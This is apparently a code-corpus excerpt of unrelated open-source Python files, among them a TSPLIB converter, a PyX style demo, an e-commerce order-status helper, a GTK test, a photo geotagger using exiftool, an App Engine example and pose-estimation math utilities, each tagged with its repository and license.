# Find start of nodes descriptions.
node_start = next(
(i for i, s in enumerate(lines) if s.startswith("NODE_COORD_SECTION"))
)
# Use first line as vehicle start/end.
coord_line = parse_node_coords(lines[node_start + 1])
coords = [[float(coord_line[1]), float(coord_line[2])]]
vehicle = {
"id": int(coord_line[0]),
"start": [float(coord_line[1]), float(coord_line[2])],
"start_index": 0,
"end": [float(coord_line[1]), float(coord_line[2])],
"end_index": 0,
}
# Remaining lines are jobs.
jobs = []
for i in range(node_start + 2, node_start + 1 + meta["DIMENSION"]):
coord_line = parse_node_coords(lines[i])
coords.append([float(coord_line[1]), float(coord_line[2])])
jobs.append(
{
"id": int(coord_line[0]),
"location": [float(coord_line[1]), float(coord_line[2])],
"location_index": i - node_start - 1,
}
)
matrix = get_matrix(coords)
return {"meta": meta, "vehicles": [vehicle], "jobs": jobs, "matrix": matrix}
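# For reference, parse_tsp expects a EUC_2D TSPLIB file shaped roughly like the
# made-up snippet below (the first node becomes the vehicle start/end, the rest are jobs):
#   NAME : sample3
#   TYPE : TSP
#   DIMENSION : 3
#   EDGE_WEIGHT_TYPE : EUC_2D
#   NODE_COORD_SECTION
#   1 38.24 20.42
#   2 39.57 26.15
#   3 40.56 25.32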
if __name__ == "__main__":
input_file = sys.argv[1]
output_name = input_file[: input_file.rfind(".tsp")] + ".json"
print("- Writing problem " + input_file + " to " + output_name)
json_input = parse_tsp(input_file)
with open(output_name, "w") as out:
json.dump(json_input, out)
| VROOM-Project/vroom-scripts | src/tsplib_to_json.py | Python | bsd-2-clause | 2,243 |
from pyx import *
text.set(text.LatexRunner)
text.preamble(r"\renewcommand{\familydefault}{\ttdefault}")
c = canvas.canvas()
# positioning is quite ugly ... but it works at the moment
x = 0
y = 0
dx = 6
dy = -0.65
length = 0.8
def drawstyle(name, showpath=0, default=0):
global x,y
p = path.path(path.moveto(x + 0.1, y+0.1 ),
path.rlineto(length/2.0, 0.3),
path.rlineto(length/2.0, -0.3))
c.stroke(p, [style.linewidth.THIck, eval("style."+name)])
if showpath:
c.stroke(p, [style.linewidth.Thin, color.gray.white])
if default:
name = name + r"\rm\quad (default)"
c.text(x + 1.5, y + 0.15, name, [text.size.footnotesize])
y += dy
if y < -16:
y = 0
x += dx
drawstyle("linecap.butt", showpath=1, default=1)
drawstyle("linecap.round", showpath=1)
drawstyle("linecap.square", showpath=1)
y += dy
drawstyle("linejoin.miter", showpath=1, default=1)
drawstyle("linejoin.round", showpath=1)
drawstyle("linejoin.bevel", showpath=1)
y += dy
drawstyle("linestyle.solid", default=1)
drawstyle("linestyle.dashed")
drawstyle("linestyle.dotted")
drawstyle("linestyle.dashdotted")
y += dy
drawstyle("linewidth.THIN")
drawstyle("linewidth.THIn")
drawstyle("linewidth.THin")
drawstyle("linewidth.Thin")
drawstyle("linewidth.thin")
drawstyle("linewidth.normal", default=1)
drawstyle("linewidth.thick")
drawstyle("linewidth.Thick")
drawstyle("linewidth.THick")
drawstyle("linewidth.THIck")
drawstyle("linewidth.THICk")
drawstyle("linewidth.THICK")
drawstyle("miterlimit.lessthan180deg", showpath=1)
drawstyle("miterlimit.lessthan90deg", showpath=1)
drawstyle("miterlimit.lessthan60deg", showpath=1)
drawstyle("miterlimit.lessthan45deg", showpath=1)
drawstyle("miterlimit.lessthan11deg", showpath=1, default=1)
y += dy
drawstyle("dash((1, 1, 2, 2, 3, 3), 0)")
drawstyle("dash((1, 1, 2, 2, 3, 3), 1)")
drawstyle("dash((1, 2, 3), 2)")
drawstyle("dash((1, 2, 3), 3)")
drawstyle("dash((1, 2, 3), 4)")
drawstyle("dash((1, 2, 3), rellengths=1)")
c.writePDFfile()
| mjg/PyX-svn | manual/pathstyles.py | Python | gpl-2.0 | 2,061 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
'''
Developer Navdeep Ghai
Email navdeep@korecent.com
'''
import frappe
import bcommerce
from frappe.utils import cint, cstr, flt, nowdate
from frappe import _, msgprint, throw
'''
Order status
'''
def get_order_status(status_id):
status = {
0:
{"name":"Incomplete", "order":0},
1:
{ "name":"Pending", "order":1},
2:
{ "name":"Shipped", "order":2},
3:
{ "name":"Partially Shipped", "order":3},
4:
{"name":"Refunded", "order":4},
5:
{ "name":"Cancelled", "order":5},
6:
{"name":"Declined", "order":6},
7:
{ "name":"Awaiting Payment", "order":7},
8:
{ "name":"Awaiting Pickup", "order":8},
9:
{"name":"Awaiting Shipment", "order":9},
10:
{ "name":"Completed", "order":10},
11:
{"name":"Awaiting Fulfillment", "order":11},
12:
		{"name":"Manual Verification Required", "order":12},
13:
{ "name":"Disputed", "order":13},
}
return status.get(cint(status_id))
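# Example (values taken from the mapping above): get_order_status(2) returns
# {"name": "Shipped", "order": 2}; the id may arrive as a string since it is
# normalised with cint() first.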
'''
Update the order status when a customer or admin changes the status of an order on the BigCommerce server
'''
def update_order_status(so_name, status_name, status_id):
data = {"so_name":so_name, "status":status_name, "status_id":status_id}
print data
frappe.db.sql("""Update `tabSales Order` SET bcommerce_order_status=%(status)s, bcommerce_status_id=%(status_id)s \
WHERE name=%(so_name)s AND docstatus=1 """, data)
| navdeepghai/bcommerce | bcommerce/utils/status.py | Python | mit | 1,445 |
#!/usr/bin/env python
import pgi
pgi.install_as_gi()
#from gi.repository import Gtk, GObject
from gi.repository import Gtk
class UI:
def __init__(self):
builder = Gtk.Builder()
builder.add_from_file("gui.glade")
window = builder.get_object('window1')
window.connect("delete-event", Gtk.main_quit)
self.led_button = builder.get_object('togglebutton1')
self.led_button.connect('toggled', self.on_led_button_toggle)
pan_adj = Gtk.Adjustment(value=0, lower=0, upper=360+1, step_increment=1, page_increment=1, page_size=1)
spinBtn = builder.get_object("spinbutton1")
spinBtn.configure(pan_adj, 1, 0)
tilt_adj = Gtk.Adjustment(value=0, lower=-30, upper=30+1, step_increment=1, page_increment=1, page_size=1)
spinBtn = builder.get_object("spinbutton2")
spinBtn.configure(tilt_adj, 1, 0)
window.show_all()
def on_led_button_toggle(self, button):
if button.get_active():
state = ['1', 'on']
button.set_label(state[1].upper())
#self.send_command(state[0])
else:
state = ['0', 'off']
button.set_label(state[1].upper())
#self.send_command(state[0])
UI()
# win = Gtk.Window()
# win.connect("delete-event", Gtk.main_quit)
# win.show_all()
Gtk.main()
| chrisspen/homebot | src/test/head_io/test_gtk.py | Python | mit | 1,346 |
from optparse import OptionParser
from elementtree.ElementTree import Element, SubElement, dump, XML, parse, dump
from bisect import bisect_left, bisect
import re
from os import listdir
import os
import os.path
import sys
try:
    import pyexiv2  # optional: only needed by the PyPictureFile implementation below
except ImportError:
    pyexiv2 = None  # fall back to the external exiftool based implementation
pictures_ext = []
verbose = False
def trace(message):
if verbose:
print message
class InvalidRange(Exception):
'''Range invalid exception'''
class InvalidNumber(Exception):
'''File name does not contain a valid number'''
class GeoTagger():
''' Global class that contains ranges '''
def __init__(self, options):
self._ranges = {}
self.options = options
self._start_values = None
def add_range(self, range):
''' Adds the range to the dictionary '''
trace('adding %s'%(range))
self._ranges[range.start] = range
self._start_values = None
def add_ranges(self, ranges):
''' Adds a list of ranges to the dictionary '''
for r in ranges:
self.add_range(r)
def get_range(self, picture_number):
''' Returns the range the picture number belongs to '''
if self._start_values == None:
self._start_values = self._ranges.keys()
self._start_values.sort()
trace('trying to get valid range for %s'%(picture_number))
trace('start ranges %s'%(self._start_values))
candidate_pos = bisect(self._start_values, long(picture_number)) - 1
trace('bisect res %s pos %s value'%(picture_number, candidate_pos))
if candidate_pos == -1:
trace('not pos found for %s'%(picture_number))
raise InvalidRange
candidate_start = self._start_values[candidate_pos] #candidate start because need to check final element of range
trace('candidate start for ' + str(picture_number) + ' ' + str(candidate_start))
range = self._ranges[candidate_start]
if not range.is_suitable(picture_number): #checks if candidate range is valid
            trace('no valid range found for ' + str(picture_number))
raise InvalidRange
return range
    def __repr__(self):
        return 'ranges:%s startRanges:%s' % (self._ranges, self._start_values)
def is_valid_picture_file(self, filename):
''' returns true if the file has the right extension'''
ext = filename.rsplit('.')[-1]
trace(filename + ' extension is ' + ext)
if ext.upper() == self.options.filetype.upper():
trace('is valid file')
return True
return False
def parse_arguments():
parser = OptionParser()
parser.add_option("-g", "--geotaggerfile", dest="geofile", help="location of geotagger xml", default="geotagger.xml")
parser.add_option("-d", "--dir", dest="picdir", help="picture directory", default=".")
parser.add_option("-v", "--verbose", dest="verbose", action="store_true", help="verbose mode on")
parser.add_option("-f", "--fileext", dest="filetype", help="picture file extension", default="jpg")
parser.add_option("-t", "--exiftool", dest="useExifTool", help="force to use exif tool")
parser.add_option("-p", "--preserve", dest="preserve", action="store_true", help="preserve original images")
(options, args) = parser.parse_args()
return options
class Position:
def __init__(self, l, lo, al):
self.latitude, self.longitude, self.altitude = l, lo, al
self.fLat = float(self.latitude)
if self.fLat > 0:
self.latOrientation = 'N'
else:
self.fLat = -self.fLat;
self.latOrientation = 'S'
self.fLong = float(self.longitude)
if self.fLong > 0:
self.longOrientation = 'E'
else:
self.fLong = -self.fLong;
self.longOrientation = 'W'
self.fAltitude = float(al)
def __repr__(self):
return 'lat:' + self.latitude + ' long:' + self.longitude + ' alt:' +self.altitude
class RangePos:
''' Range of picture and related position'''
def __init__(self, start, end, position):
self.start, self.end, self.position = start, end, position
def __init__(self, xmlrange):
        ''' Constructor from an xml <range> row; note it overrides the positional __init__ above. '''
self.start = long(xmlrange.attrib['from'])
self.end = long(xmlrange.attrib['to'])
try:
lat = xmlrange.attrib['latitude']
lon = xmlrange.attrib['longitude']
alt = xmlrange.attrib['altitude']
except:
trace('some attributes not found')
self.position = Position(lat, lon, alt)
def is_suitable(self, picture):
''' tells if a picture number is suitable for the selected range '''
if (picture >= self.start) and (picture <= self.end):
return True
return False
def __repr__(self):
return 'start:' + str(self.start) + ' end:' + str(self.end) + ' pos:' + repr(self.position)
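# An illustrative geotagger.xml row this class can parse (attribute names match the
# constructor above, the values are made up):
#   <range from="100" to="120" latitude="45.07" longitude="7.68" altitude="240"/>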
numbersRe = re.compile('[0-9]+') #matches AT LEAST one number
class BasePictureFile:
''' represents the picture file '''
def __init__(self, name, dir):
self._name = name
self._dir = dir
self._file_with_path = self._dir + os.path.sep + self._name
def get_number(self):
res = numbersRe.search(self._name)
if res == None:
raise InvalidNumber
trace('get number for ' + self._name + ' ' + res.group(0))
return long(res.group(0))
class PyPictureFile(BasePictureFile):
''' override the write method using pyexiv2 library'''
def write_exif(self, pos, preserve):
metadata = pyexiv2.ImageMetadata(self._file_with_path)
metadata.read()
tag = metadata['Exif.GPSInfo.GPSLatitudeRef']
tag.value = pos.latOrientation
tag = metadata['Exif.GPSInfo.GPSLatitude']
tag.value = str(pos.fLat)
tag = metadata['Exif.GPSInfo.GPSLongitudeRef']
tag.value = pos.longOrientation
tag = metadata['Exif.GPSInfo.GPSLongitude']
tag.value = str(pos.fLong)
metadata.write()
class ExToolPictureFile(BasePictureFile):
''' override the write method relaying on external exiftool command '''
def write_exif(self, pos, preserve):
if preserve:
override_options = ''
else:
override_options = '-overwrite_original'
if sys.platform != 'win32':
output_file = ''
command = 'exiftool -m -n %s -GPSLongitude=%f -GPSLatitude=%f \
-GPSLongitudeRef=%s -GPSLatitudeRef=%s -GPSAltitude=%f "%s"'\
%(override_options, pos.fLong,pos.fLat,pos.longOrientation,pos.latOrientation,pos.fAltitude,self._file_with_path)
else:
command = 'exiftool.exe -m -n %s -GPSLongitude=%f -GPSLatitude=%f \
-GPSLongitudeRef=%s -GPSLatitudeRef=%s -GPSAltitude=%f "%s"'\
%(override_options, pos.fLong,pos.fLat,pos.longOrientation,pos.latOrientation,pos.fAltitude, self._file_with_path)
trace('Executing ' + command)
os.popen(command)
#TODO switch if import fails
PictureFile = ExToolPictureFile
def process_xml_file(filexml, g):
''' Processes xml file and stores info in ranges contained in g'''
trace('Processing ' + filexml)
tree = parse(filexml)
allranges = tree.findall('range')
for xmlrange in allranges:
trace('processing xml row')
#try:
r = RangePos(xmlrange)
g.add_range(r)
#except:
# trace('unable to handle:')
# if verbose:
# dump(xmlrange)
def ranges_generator(filexml):
''' Processes xml file and stores info in ranges contained in g'''
trace('Processing ' + filexml)
tree = parse(filexml)
allranges = tree.findall('range')
for xmlrange in allranges:
trace('processing xml row')
#try:
yield RangePos(xmlrange)
#except:
# trace('unable to handle:')
# if verbose:
# dump(xmlrange)
def write_info_to_pictures(g, dir, status_report):
'''Writes exif in the pictures stored in dir path'''
trace('trying to write files in ' + dir)
picture_files= filter(g.is_valid_picture_file, listdir(dir))
pictures_num = len(picture_files)
if not pictures_num:
status_report('No pictures found in folder')
return
for file_num, file in enumerate(picture_files):
try:
status_report('Processing %s, %d of %d'%(file, file_num + 1, pictures_num))
p = PictureFile(file, dir)
n = p.get_number() #number from the name of the picture
r = g.get_range(n) #range the number belongs to
            trace('Got range %s'%(r))
p.write_exif(r.position, g.options.preserve)
except InvalidRange:
trace('Range invalid for %s'%(file))
except InvalidNumber:
trace('File %s does not contain a number'%(file))
def load_extensions():
ext_file = open('extensions.ini')
[pictures_ext.append(ext[:-1]) for ext in ext_file] #taking off the \n
if 'JPG' not in pictures_ext:
pictures_ext.append('JPG')
ext_file.close()
def run(options, status_report):
    global verbose, PictureFile # TODO Remove me; PictureFile must be global for the -t override to take effect
if options.useExifTool:
trace('forcing to use exiftool')
PictureFile = ExToolPictureFile
verbose = options.verbose
trace('verbose mode on')
load_extensions()
g = GeoTagger(options)
try:
g.add_ranges(ranges_generator(options.geofile))
except:
print 'Unable to process %s'%options.geofile
return
write_info_to_pictures(g, options.picdir, status_report)
def command_line_status_rep(status):
trace(status)
if __name__ == '__main__':
options = parse_arguments()
run(options, command_line_status_rep)
| Sjith/geotagger-1 | py/geotagger.py | Python | gpl-3.0 | 10,087 |
from google.appengine.ext import db
import datetime
import webapp2
class Player(db.Model):
name = db.StringProperty()
class Guild(db.Model):
name = db.StringProperty()
class GuildMembership(db.Model):
player = db.ReferenceProperty(Player, collection_name='guild_memberships')
guild = db.ReferenceProperty(Guild, collection_name='player_memberships')
class MainPage(webapp2.RequestHandler):
def get(self):
# Create some test data.
g1 = Guild(name='The Foo Battlers')
g2 = Guild(name='The Bar Fighters')
p1 = Player(name='druidjane')
p2 = Player(name='TheHulk')
db.put([p1, p2, g1, g2])
gm1 = GuildMembership(player=p1, guild=g1)
gm2 = GuildMembership(player=p1, guild=g2)
gm3 = GuildMembership(player=p2, guild=g2)
db.put([gm1, gm2, gm3])
player_key = p1.key()
guild_key = g2.key()
# ...
# Guilds to which a player belongs:
p = db.get(player_key)
self.response.write('<p>Guilds to which druidjane belongs:</p><ul>')
for gm in p.guild_memberships:
self.response.write('<li>%s</li>' % gm.guild.name)
self.response.write('</ul>')
# Players that belong to a guild:
g = db.get(guild_key)
self.response.write('<p>Members of The Bar Fighters:</p><ul>')
for gm in g.player_memberships:
self.response.write('<li>%s</li>' % gm.player.name)
self.response.write('</ul>')
db.delete([p1, p2, g1, g2, gm1, gm2, gm3])
self.response.write('<p>Entities deleted.</p>')
self.response.write('<p>The time is: %s</p>'
% str(datetime.datetime.now()))
app = webapp2.WSGIApplication([('/', MainPage)], debug=True)
| jscontreras/learning-gae | pgae-examples-master/2e/python/ext_db/relationshipslinkmodel/main.py | Python | lgpl-3.0 | 1,837 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LongWrapper(Model):
"""LongWrapper.
:param field1:
:type field1: long
:param field2:
:type field2: long
"""
_attribute_map = {
'field1': {'key': 'field1', 'type': 'long'},
'field2': {'key': 'field2', 'type': 'long'},
}
def __init__(self, field1=None, field2=None):
self.field1 = field1
self.field2 = field2
| balajikris/autorest | src/generator/AutoRest.Python.Tests/Expected/AcceptanceTests/BodyComplex/autorestcomplextestservice/models/long_wrapper.py | Python | mit | 899 |
# Some of the code are from the TUM evaluation toolkit:
# https://vision.in.tum.de/data/datasets/rgbd-dataset/tools#absolute_trajectory_error_ate
import math
import numpy as np
_FLOAT_EPS_4 = np.finfo(float).eps * 4.0  # fallback threshold used by mat2euler below
def compute_ate(gtruth_file, pred_file):
gtruth_list = read_file_list(gtruth_file)
pred_list = read_file_list(pred_file)
matches = associate(gtruth_list, pred_list, 0, 0.01)
if len(matches) < 2:
return False
gtruth_xyz = np.array([[float(value) for value in gtruth_list[a][0:3]] for a,b in matches])
pred_xyz = np.array([[float(value) for value in pred_list[b][0:3]] for a,b in matches])
# Make sure that the first matched frames align (no need for rotational alignment as
# all the predicted/ground-truth snippets have been converted to use the same coordinate
# system with the first frame of the snippet being the origin).
offset = gtruth_xyz[0] - pred_xyz[0]
pred_xyz += offset[None,:]
# Optimize the scaling factor
scale = np.sum(gtruth_xyz * pred_xyz)/np.sum(pred_xyz ** 2)
alignment_error = pred_xyz * scale - gtruth_xyz
rmse = np.sqrt(np.sum(alignment_error ** 2))/len(matches)
return rmse
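# Hedged usage sketch (file names are placeholders): rmse = compute_ate('stamped_gt.txt',
# 'stamped_pred.txt'); note the function returns False when fewer than two timestamps
# can be matched between the two trajectories.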
def read_file_list(filename):
"""
Reads a trajectory from a text file.
File format:
The file format is "stamp d1 d2 d3 ...", where stamp denotes the time stamp (to be matched)
and "d1 d2 d3.." is arbitary data (e.g., a 3D position and 3D orientation) associated to this timestamp.
Input:
filename -- File name
Output:
dict -- dictionary of (stamp,data) tuples
"""
file = open(filename)
data = file.read()
lines = data.replace(","," ").replace("\t"," ").split("\n")
list = [[v.strip() for v in line.split(" ") if v.strip()!=""] for line in lines if len(line)>0 and line[0]!="#"]
list = [(float(l[0]),l[1:]) for l in list if len(l)>1]
return dict(list)
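# Example of a line accepted by read_file_list (timestamp followed by arbitrary data,
# here an invented TUM-style pose):
#   1305031102.175304 1.3405 0.6266 1.6575 0.6574 0.6126 -0.2949 -0.3248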
def associate(first_list, second_list,offset,max_difference):
"""
Associate two dictionaries of (stamp,data). As the time stamps never match exactly, we aim
to find the closest match for every input tuple.
Input:
first_list -- first dictionary of (stamp,data) tuples
second_list -- second dictionary of (stamp,data) tuples
offset -- time offset between both dictionaries (e.g., to model the delay between the sensors)
max_difference -- search radius for candidate generation
Output:
matches -- list of matched tuples ((stamp1,data1),(stamp2,data2))
"""
first_keys = list(first_list.keys())
second_keys = list(second_list.keys())
potential_matches = [(abs(a - (b + offset)), a, b)
for a in first_keys
for b in second_keys
if abs(a - (b + offset)) < max_difference]
potential_matches.sort()
matches = []
for diff, a, b in potential_matches:
if a in first_keys and b in second_keys:
first_keys.remove(a)
second_keys.remove(b)
matches.append((a, b))
matches.sort()
return matches
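# Tiny illustration (values invented): with first_list={1.00: ['a']},
# second_list={1.004: ['b']}, offset=0 and max_difference=0.01, the only candidate
# pair passes the threshold and associate() returns [(1.00, 1.004)].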
def rot2quat(R):
rz, ry, rx = mat2euler(R)
qw, qx, qy, qz = euler2quat(rz, ry, rx)
return qw, qx, qy, qz
def quat2mat(q):
''' Calculate rotation matrix corresponding to quaternion
https://afni.nimh.nih.gov/pub/dist/src/pkundu/meica.libs/nibabel/quaternions.py
Parameters
----------
q : 4 element array-like
Returns
-------
M : (3,3) array
Rotation matrix corresponding to input quaternion *q*
Notes
-----
Rotation matrix applies to column vectors, and is applied to the
left of coordinate vectors. The algorithm here allows non-unit
quaternions.
References
----------
Algorithm from
http://en.wikipedia.org/wiki/Rotation_matrix#Quaternion
Examples
--------
>>> import numpy as np
>>> M = quat2mat([1, 0, 0, 0]) # Identity quaternion
>>> np.allclose(M, np.eye(3))
True
>>> M = quat2mat([0, 1, 0, 0]) # 180 degree rotn around axis 0
>>> np.allclose(M, np.diag([1, -1, -1]))
True
'''
w, x, y, z = q
Nq = w*w + x*x + y*y + z*z
if Nq < 1e-8:
return np.eye(3)
s = 2.0/Nq
X = x*s
Y = y*s
Z = z*s
wX = w*X; wY = w*Y; wZ = w*Z
xX = x*X; xY = x*Y; xZ = x*Z
yY = y*Y; yZ = y*Z; zZ = z*Z
return np.array(
[[ 1.0-(yY+zZ), xY-wZ, xZ+wY ],
[ xY+wZ, 1.0-(xX+zZ), yZ-wX ],
[ xZ-wY, yZ+wX, 1.0-(xX+yY) ]])
def mat2euler(M, cy_thresh=None, seq='zyx'):
'''
Taken From: http://afni.nimh.nih.gov/pub/dist/src/pkundu/meica.libs/nibabel/eulerangles.py
Discover Euler angle vector from 3x3 matrix
Uses the conventions above.
Parameters
----------
M : array-like, shape (3,3)
cy_thresh : None or scalar, optional
threshold below which to give up on straightforward arctan for
estimating x rotation. If None (default), estimate from
precision of input.
Returns
-------
z : scalar
y : scalar
x : scalar
Rotations in radians around z, y, x axes, respectively
Notes
-----
If there was no numerical error, the routine could be derived using
Sympy expression for z then y then x rotation matrix, which is::
[ cos(y)*cos(z), -cos(y)*sin(z), sin(y)],
[cos(x)*sin(z) + cos(z)*sin(x)*sin(y), cos(x)*cos(z) - sin(x)*sin(y)*sin(z), -cos(y)*sin(x)],
[sin(x)*sin(z) - cos(x)*cos(z)*sin(y), cos(z)*sin(x) + cos(x)*sin(y)*sin(z), cos(x)*cos(y)]
with the obvious derivations for z, y, and x
z = atan2(-r12, r11)
y = asin(r13)
x = atan2(-r23, r33)
for x,y,z order
y = asin(-r31)
x = atan2(r32, r33)
z = atan2(r21, r11)
Problems arise when cos(y) is close to zero, because both of::
z = atan2(cos(y)*sin(z), cos(y)*cos(z))
x = atan2(cos(y)*sin(x), cos(x)*cos(y))
will be close to atan2(0, 0), and highly unstable.
The ``cy`` fix for numerical instability below is from: *Graphics
Gems IV*, Paul Heckbert (editor), Academic Press, 1994, ISBN:
0123361559. Specifically it comes from EulerAngles.c by Ken
Shoemake, and deals with the case where cos(y) is close to zero:
See: http://www.graphicsgems.org/
The code appears to be licensed (from the website) as "can be used
without restrictions".
'''
M = np.asarray(M)
if cy_thresh is None:
try:
cy_thresh = np.finfo(M.dtype).eps * 4
except ValueError:
cy_thresh = _FLOAT_EPS_4
r11, r12, r13, r21, r22, r23, r31, r32, r33 = M.flat
# cy: sqrt((cos(y)*cos(z))**2 + (cos(x)*cos(y))**2)
cy = math.sqrt(r33*r33 + r23*r23)
if seq=='zyx':
if cy > cy_thresh: # cos(y) not close to zero, standard form
z = math.atan2(-r12, r11) # atan2(cos(y)*sin(z), cos(y)*cos(z))
y = math.atan2(r13, cy) # atan2(sin(y), cy)
x = math.atan2(-r23, r33) # atan2(cos(y)*sin(x), cos(x)*cos(y))
else: # cos(y) (close to) zero, so x -> 0.0 (see above)
# so r21 -> sin(z), r22 -> cos(z) and
z = math.atan2(r21, r22)
y = math.atan2(r13, cy) # atan2(sin(y), cy)
x = 0.0
elif seq=='xyz':
if cy > cy_thresh:
y = math.atan2(-r31, cy)
x = math.atan2(r32, r33)
z = math.atan2(r21, r11)
else:
z = 0.0
if r31 < 0:
y = np.pi/2
            x = math.atan2(r12, r13)
else:
y = -np.pi/2
else:
raise Exception('Sequence not recognized')
return z, y, x
import functools
def euler2mat(z=0, y=0, x=0, isRadian=True):
''' Return matrix for rotations around z, y and x axes
Uses the z, then y, then x convention above
Parameters
----------
z : scalar
Rotation angle in radians around z-axis (performed first)
y : scalar
Rotation angle in radians around y-axis
x : scalar
Rotation angle in radians around x-axis (performed last)
Returns
-------
M : array shape (3,3)
Rotation matrix giving same rotation as for given angles
Examples
--------
>>> zrot = 1.3 # radians
>>> yrot = -0.1
>>> xrot = 0.2
>>> M = euler2mat(zrot, yrot, xrot)
>>> M.shape == (3, 3)
True
The output rotation matrix is equal to the composition of the
individual rotations
>>> M1 = euler2mat(zrot)
>>> M2 = euler2mat(0, yrot)
>>> M3 = euler2mat(0, 0, xrot)
>>> composed_M = np.dot(M3, np.dot(M2, M1))
>>> np.allclose(M, composed_M)
True
You can specify rotations by named arguments
>>> np.all(M3 == euler2mat(x=xrot))
True
When applying M to a vector, the vector should column vector to the
right of M. If the right hand side is a 2D array rather than a
vector, then each column of the 2D array represents a vector.
>>> vec = np.array([1, 0, 0]).reshape((3,1))
>>> v2 = np.dot(M, vec)
>>> vecs = np.array([[1, 0, 0],[0, 1, 0]]).T # giving 3x2 array
>>> vecs2 = np.dot(M, vecs)
Rotations are counter-clockwise.
>>> zred = np.dot(euler2mat(z=np.pi/2), np.eye(3))
>>> np.allclose(zred, [[0, -1, 0],[1, 0, 0], [0, 0, 1]])
True
>>> yred = np.dot(euler2mat(y=np.pi/2), np.eye(3))
>>> np.allclose(yred, [[0, 0, 1],[0, 1, 0], [-1, 0, 0]])
True
>>> xred = np.dot(euler2mat(x=np.pi/2), np.eye(3))
>>> np.allclose(xred, [[1, 0, 0],[0, 0, -1], [0, 1, 0]])
True
Notes
-----
The direction of rotation is given by the right-hand rule (orient
the thumb of the right hand along the axis around which the rotation
occurs, with the end of the thumb at the positive end of the axis;
curl your fingers; the direction your fingers curl is the direction
of rotation). Therefore, the rotations are counterclockwise if
looking along the axis of rotation from positive to negative.
'''
if not isRadian:
z = ((np.pi)/180.) * z
y = ((np.pi)/180.) * y
x = ((np.pi)/180.) * x
assert z>=(-np.pi) and z < np.pi, 'Inapprorpriate z: %f' % z
assert y>=(-np.pi) and y < np.pi, 'Inapprorpriate y: %f' % y
assert x>=(-np.pi) and x < np.pi, 'Inapprorpriate x: %f' % x
Ms = []
if z:
cosz = math.cos(z)
sinz = math.sin(z)
Ms.append(np.array(
[[cosz, -sinz, 0],
[sinz, cosz, 0],
[0, 0, 1]]))
if y:
cosy = math.cos(y)
siny = math.sin(y)
Ms.append(np.array(
[[cosy, 0, siny],
[0, 1, 0],
[-siny, 0, cosy]]))
if x:
cosx = math.cos(x)
sinx = math.sin(x)
Ms.append(np.array(
[[1, 0, 0],
[0, cosx, -sinx],
[0, sinx, cosx]]))
if Ms:
return functools.reduce(np.dot, Ms[::-1])
return np.eye(3)
def euler2quat(z=0, y=0, x=0, isRadian=True):
''' Return quaternion corresponding to these Euler angles
Uses the z, then y, then x convention above
Parameters
----------
z : scalar
Rotation angle in radians around z-axis (performed first)
y : scalar
Rotation angle in radians around y-axis
x : scalar
Rotation angle in radians around x-axis (performed last)
Returns
-------
quat : array shape (4,)
Quaternion in w, x, y z (real, then vector) format
Notes
-----
We can derive this formula in Sympy using:
1. Formula giving quaternion corresponding to rotation of theta radians
about arbitrary axis:
http://mathworld.wolfram.com/EulerParameters.html
2. Generated formulae from 1.) for quaternions corresponding to
theta radians rotations about ``x, y, z`` axes
3. Apply quaternion multiplication formula -
http://en.wikipedia.org/wiki/Quaternions#Hamilton_product - to
formulae from 2.) to give formula for combined rotations.
'''
if not isRadian:
z = ((np.pi)/180.) * z
y = ((np.pi)/180.) * y
x = ((np.pi)/180.) * x
z = z/2.0
y = y/2.0
x = x/2.0
cz = math.cos(z)
sz = math.sin(z)
cy = math.cos(y)
sy = math.sin(y)
cx = math.cos(x)
sx = math.sin(x)
return np.array([
cx*cy*cz - sx*sy*sz,
cx*sy*sz + cy*cz*sx,
cx*cz*sy - sx*cy*sz,
cx*cy*sz + sx*cz*sy])
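# --- Hedged example (editor addition, not part of the original module) -----
# The Notes above derive euler2quat by Hamilton-multiplying the per-axis
# quaternions qx * qy * qz (z is applied first, so it sits right-most in the
# product). The helper names below (_quat_mult, _euler2quat_check) are
# illustrative assumptions; they verify that composition numerically.
def _quat_mult(q1, q2):
    # Hamilton product of two quaternions given in (w, x, y, z) order.
    w1, x1, y1, z1 = q1
    w2, x2, y2, z2 = q2
    return np.array([
        w1*w2 - x1*x2 - y1*y2 - z1*z2,
        w1*x2 + x1*w2 + y1*z2 - z1*y2,
        w1*y2 - x1*z2 + y1*w2 + z1*x2,
        w1*z2 + x1*y2 - y1*x2 + z1*w2])
def _euler2quat_check(z=0.3, y=-0.2, x=0.1):
    # Per-axis quaternions: w = cos(theta/2), vector part = sin(theta/2) * axis.
    qz = np.array([math.cos(z/2.), 0., 0., math.sin(z/2.)])
    qy = np.array([math.cos(y/2.), 0., math.sin(y/2.), 0.])
    qx = np.array([math.cos(x/2.), math.sin(x/2.), 0., 0.])
    composed = _quat_mult(_quat_mult(qx, qy), qz)
    return np.allclose(composed, euler2quat(z, y, x))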
def pose_vec_to_mat(vec):
tx = vec[0]
ty = vec[1]
tz = vec[2]
trans = np.array([tx, ty, tz]).reshape((3,1))
    rot = euler2mat(vec[5], vec[4], vec[3])  # vec holds (tx, ty, tz, rx, ry, rz); euler2mat takes (z, y, x)
Tmat = np.concatenate((rot, trans), axis=1)
hfiller = np.array([0, 0, 0, 1]).reshape((1,4))
Tmat = np.concatenate((Tmat, hfiller), axis=0)
return Tmat
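# Hedged usage note (editor addition): pose_vec_to_mat builds the homogeneous
# transform [[R, t], [0, 0, 0, 1]] from a 6-vector; a zero pose therefore
# maps to the 4x4 identity:
#
#     >>> np.allclose(pose_vec_to_mat(np.zeros(6)), np.eye(4))
#     True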
def dump_pose_seq_TUM(out_file, poses, times):
# First frame as the origin
first_pose = pose_vec_to_mat(poses[0])
with open(out_file, 'w') as f:
for p in range(len(times)):
this_pose = pose_vec_to_mat(poses[p])
this_pose = np.dot(first_pose, np.linalg.inv(this_pose))
tx = this_pose[0, 3]
ty = this_pose[1, 3]
tz = this_pose[2, 3]
rot = this_pose[:3, :3]
qw, qx, qy, qz = rot2quat(rot)
f.write('%f %f %f %f %f %f %f %f\n' % (times[p], tx, ty, tz, qx, qy, qz, qw)) | tinghuiz/SfMLearner | kitti_eval/pose_evaluation_utils.py | Python | mit | 13,592 |
# $Filename$
# $Authors$
# Last Changed: $Date$ $Committer$ $Revision-Id$
#
# Copyright (c) 2003-2011, German Aerospace Center (DLR)
#
# All rights reserved.
